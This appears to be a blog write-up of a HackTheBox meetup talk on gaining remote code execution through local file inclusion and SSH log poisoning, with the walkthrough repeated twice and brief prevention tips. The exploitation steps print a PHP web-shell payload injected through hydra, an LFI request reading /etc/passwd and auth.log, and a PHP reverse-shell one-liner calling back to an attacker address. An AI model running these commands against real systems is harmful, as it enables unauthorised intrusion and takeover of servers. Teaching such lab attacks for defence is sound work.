HackTheBox Meetup - LFI2RCE

How to Achieve Remote Code Execution through LFI and Log Poisoning? 🚀🔍

On November 29, 2024, I had the incredible opportunity to speak at the first HackTheBox Meetup event in Brussels, organized by the Mohamed Waked Nachar. During my talk, I highlighted a critical vulnerability that can be exploited to compromise an entire system if it's susceptible to LFI (Local File Inclusion) and log file poisoning attacks. 🛡️💻

Here's a detailed look at how attackers can achieve Remote Code Execution (RCE) through LFI via log poisoning, for more details, you can also download the powerpoint presentation attached and video added below.

Enumeration Phase 🕵️‍♂️

Identify Live Hosts on the Network:
- sudo arp-scan -l
Identify Ports and Services:
- nmap -A 192.168.17.132 -p- -oX lfi.xml
Create a Structured HTML Nmap Report:
- xsltproc -o lfi.html lfi.xml

Vulnerability Scanning Phase 🔍🛠️

Identify Web Directories and Files:
- dirb http://192.168.17.132/ wordlist.txt
Identify the Vulnerable Parameter:
- ffuf -w wordlist.txt -u http://192.168.17.132//antibot_image/antibots/info.php/?FUZZ=/etc/passwd

Exploitation Phase 🚨⚡

Poison SSH Logfile:
- hydra 192.168.17.132 -l '<?php system($_GET['shell']); ?>' -p test ssh -s 2211
Retrieve the Poisoned Log File via LFI:
- http://192.168.17.132/antibot_image/antibots/info.php?image=/var/log/auth.log&commande=ls
Obtain a Reverse Shell via LFI (LFI to RCE):
- http://192.168.17.132/antibot_image/antibots/info.php?image=/var/log/auth.log&commande=php -r '$sock=fsockopen("192.168.17.130",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Prevention Tips 🛡️

Validate User Input: Always ensure input validation to prevent malicious data from being processed.
Sanitize User Input: Sanitize inputs to strip out potentially harmful characters.
Use Whitelists: Implement whitelisting to allow only known good inputs.
Principle of Least Privilege: Minimize user permissions to the absolute minimum required.

The demo of this attack is attached to this post. 📹🎥

PreviousMy scanning methodology NextRadio Equans - QR Code Awareness campaign

Last updated 3 months ago

How to Achieve Remote Code Execution through LFI and Log Poisoning? 🚀🔍

Enumeration Phase 🕵️‍♂️

Identify Live Hosts on the Network:

sudo arp-scan -l

Identify Ports and Services:

nmap -A 192.168.17.132 -p- -oX lfi.xml

Create a Structured HTML Nmap Report:

xsltproc -o lfi.html lfi.xml

Vulnerability Scanning Phase 🔍🛠️

Identify Web Directories and Files:

dirb http://192.168.17.132/ wordlist.txt

Identify the Vulnerable Parameter:

ffuf -w wordlist.txt -u http://192.168.17.132//antibot_image/antibots/info.php/?FUZZ=/etc/passwd

Exploitation Phase 🚨⚡

Poison SSH Logfile:

hydra 192.168.17.132 -l '<?php system($_GET['shell']); ?>' -p test ssh -s 2211

Retrieve the Poisoned Log File via LFI:

http://192.168.17.132/antibot_image/antibots/info.php?image=/var/log/auth.log&commande=ls

Obtain a Reverse Shell via LFI (LFI to RCE):

http://192.168.17.132/antibot_image/antibots/info.php?image=/var/log/auth.log&commande=php -r '$sock=fsockopen("192.168.17.130",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Prevention Tips 🛡️

Validate User Input: Always ensure input validation to prevent malicious data from being processed.

Sanitize User Input: Sanitize inputs to strip out potentially harmful characters.

Use Whitelists: Implement whitelisting to allow only known good inputs.

Principle of Least Privilege: Minimize user permissions to the absolute minimum required.

The demo of this attack is attached to this post. 📹🎥

12MB

LFI2RCE-Eng-LinkedInFinal.pptx

Power Point Presentation of Local File Include and Log File Poisoning to achieve Remote code Execution

32MB

FinalDemo.mp4

Demonstration in video of the attack